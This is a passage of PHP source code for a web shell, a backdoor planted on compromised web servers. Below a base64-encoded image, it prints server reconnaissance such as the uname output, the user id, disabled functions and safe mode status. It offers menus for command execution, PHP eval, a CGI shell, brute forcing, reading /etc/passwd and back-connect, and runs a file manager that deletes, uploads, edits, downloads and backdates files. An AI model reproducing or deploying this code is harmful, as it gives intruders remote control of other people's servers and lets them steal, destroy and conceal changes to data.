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
" border=0 width="260" height="180"></a>
				
				</td>

                        <td>

                            <span style="float:right;"> <?php echo "Hostname: ".$_SERVER['HTTP_HOST']."";?> </span></br>



                            <?php

                            $curl_on = @function_exists('curl_version');

                            $mysql_on = @function_exists('mysql_connect');

                            $mssql_on = @function_exists('mssql_connect');

                            $pg_on = @function_exists('pg_connect');

                            $ora_on = @function_exists('ocilogon');

							$safe_mode = @ini_get('safe_mode');

                            echo (($safe_mode)?("Safe_mod: <b><font color=red>ON</font></b> - "):("Safe_mod: <b><font color=green>OFF</font></b> - "));

                            echo "PHP version: <b>".@phpversion()."</b> - ";

                            echo "cURL: ".(($curl_on)?("<b><font color=red>ON</font></b> - "):("<b><font color=green>OFF</font></b> - "));

                            echo "MySQL: <b>";

                            $mysql_on = @function_exists('mysql_connect');

                            if($mysql_on){

                                echo "<font color=red>ON</font></b> - "; } else { echo "<font color=green>OFF</font></b> - "; }

                            echo "MSSQL: <b>";

                            $mssql_on = @function_exists('mssql_connect');

                            if($mssql_on){echo "<font color=red>ON</font></b> - ";}else{echo "<font color=green>OFF</font></b> - ";}

                            echo "PostgreSQL: <b>";

                            $pg_on = @function_exists('pg_connect');

                            if($pg_on){echo "<font color=red>ON</font></b> - ";}else{echo "<font color=green>OFF</font></b> - ";}

                            echo "Oracle: <b>";

                            $ora_on = @function_exists('ocilogon');

                            if($ora_on){echo "<font color=red>ON</font></b>";}else{echo "<font color=green>OFF</font></b><BR>";}



                            echo "Disable functions : <b>";

                            if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b><BR>";}else{echo "<font color=red>$df</font></b><BR>";}



                            echo "<font color=white>Uname -a</font>: ".@substr(@php_uname(),0,120)."<br>";

                            echo "<font color=white>Server</font>: ".@substr($SERVER_SOFTWARE,0,120)." - <font color=white>id</font>: ".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().")<br>";

                            ?>		</td>

                    </tr></table></td>

        </tr>

        <tr class="alt1">
				<font face="ARIALBLACK" color="#00e400"><marquee direction="right"loop="true" scrollamount="200" style="-webkit-animation: sonicq12 3s infinite"><b>_________________________________ </b> <b> _________________________________ _________________________________</b></marquee></font><br />
            <td  width=100%><span style="float:right;">[Server IP: <?php echo "<font color='#00e400'>".gethostbyname($_SERVER['SERVER_NAME'])."</font>";?> - Your IP: <?php echo "<font color='#00e400'>".$_SERVER['REMOTE_ADDR']."</font>";?> - <?php if ($admin['check']){?><a href="javascript:goaction('logout');"><font color="#00e400">Log Out</font></a><?php } ?><?php if($admin['check'] == false){ ?> <font color="red">PUBLIC SH3LL</font> <?php } ?>] </span><br />
                <font face="ARIALBLACK" color="red"><marquee direction="left"loop="true" scrollamount="200" style="-webkit-animation: sonicq12 3s infinite"><b>_________________________________ </b> <b> _________________________________ _________________________________</b></marquee></font><br />


<center>
               <b>|--></b> 
				<a href="javascript:goaction('file');">File Manager</a> |

                <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |

                <a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |

                <a href="javascript:goaction('shell');">Execute Command</a> |

                <a href="javascript:goaction('phpenv');">PHP Variable</a> |

                <a href="javascript:goaction('eval');">Eval PHP Code</a> |

				<a href="javascript:goaction('cgi');">CGI Shell</a>
				
                <?php if (!IS_WIN) {?> | <a href="javascript:goaction('brute');">Brute</a> <?php }?>

                <?php if (!IS_WIN) {?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php }?>

                <?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
				
				<b><--|</b>
</center>            
			</td>

        </tr>

    </table>

	
    <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>

    <?php



    formhead(array('name'=>'goaction'));

    makehide('action');

    formfoot();



    $errmsg && m($errmsg);





    !$dir && $dir = '.';

    $nowpath = getPath(SA_ROOT, $dir);

    if (substr($dir, -1) != '/') {

        $dir = $dir.'/';

    }

    $uedir = ue($dir);



    if (!$action || $action == 'file') {





        $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';





        if ($doing == 'deldir' && $thefile) {

            if (!file_exists($thefile)) {

                m($thefile.' directory does not exist');

            } else {

                m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));

            }

        }





        elseif ($newdirname) {

            $mkdirs = $nowpath.$newdirname;

            if (file_exists($mkdirs)) {

                m('Directory has already existed');

            } else {

                m('Directory created '.(@mkdir($mkdirs,0755) ? 'success' : 'failed'));

                @chmod($mkdirs,0755);

            }

        }





        elseif ($doupfile) {

            m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));

        }





        elseif ($editfilename && $filecontent) {

            $fp = @fopen($editfilename,'w');

            m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));

            @fclose($fp);

        }





        elseif ($pfile && $newperm) {

            if (!file_exists($pfile)) {

                m('The original file does not exist');

            } else {

                $newperm = base_convert($newperm,8,10);

                m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));

            }

        }





        elseif ($oldname && $newfilename) {

            $nname = $nowpath.$newfilename;

            if (file_exists($nname) || !file_exists($oldname)) {

                m($nname.' has already existed or original file does not exist');

            } else {

                m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));

            }

        }





        elseif ($sname && $tofile) {

            if (file_exists($tofile) || !file_exists($sname)) {

                m('The goal file has already existed or original file does not exist');

            } else {

                m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));

            }

        }





        elseif ($curfile && $tarfile) {

            if (!@file_exists($curfile) || !@file_exists($tarfile)) {

                m('The goal file has already existed or original file does not exist');

            } else {

                $time = @filemtime($tarfile);

                m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));

            }

        }





        elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {

            if (!@file_exists($curfile)) {

                m(basename($curfile).' does not exist');

            } else {

                $time = strtotime("$year-$month-$day $hour:$minute:$second");

                m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));

            }

        }





        elseif($doing == 'downrar') {

            if ($dl) {

                $dfiles='';

                foreach ($dl as $filepath => $value) {

                    $dfiles.=$filepath.',';

                }

                $dfiles=substr($dfiles,0,strlen($dfiles)-1);

                $dl=explode(',',$dfiles);

                $zip=new PHPZip($dl);

                $code=$zip->out;

                header('Content-type: application/octet-stream');

                header('Accept-Ranges: bytes');

                header('Accept-Length: '.strlen($code));

                header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'sql.gz');

                echo $code;

                exit;

            } else {

                m('Please select file(s)');

            }

        }





        elseif($doing == 'delfiles') {

            if ($dl) {

                $dfiles='';

                $succ = $fail = 0;

                foreach ($dl as $filepath => $value) {

                    if (@unlink($filepath)) {

                        $succ++;

                    } else {

                        $fail++;

                    }

                }

                m('Deleted file have finished??choose '.count($dl).' success '.$succ.' fail '.$fail);

            } else {

                m('Please select file(s)');

            }

        }





        formhead(array('name'=>'createdir'));

        makehide('newdirname');

        makehide('dir',$nowpath);

        formfoot();

        formhead(array('name'=>'fileperm'));

        makehide('newperm');

        makehide('pfile');

        makehide('dir',$nowpath);

        formfoot();

        formhead(array('name'=>'copyfile'));

        makehide('sname');

        makehide('tofile');

        makehide('dir',$nowpath);

        formfoot();

        formhead(array('name'=>'rename'));

        makehide('oldname');

        makehide('newfilename');

        makehide('dir',$nowpath);

        formfoot();

        formhead(array('name'=>'fileopform'));

        makehide('action');

        makehide('opfile');

        makehide('dir');

        formfoot();



        $free = @disk_free_space($nowpath);

        !$free && $free = 0;

        $all = @disk_total_space($nowpath);

        !$all && $all = 0;

        $used = $all-$free;

        $used_percent = @round(100/($all/$free),2);

        p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>'.sizecount($free).'</font> of <font color=red>'.sizecount($all).'</font> (<font color=red>'.$used_percent.'</font>%)</font>');



        ?>

        <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">

            <form action="" method="post" id="godir" name="godir">

                <tr>

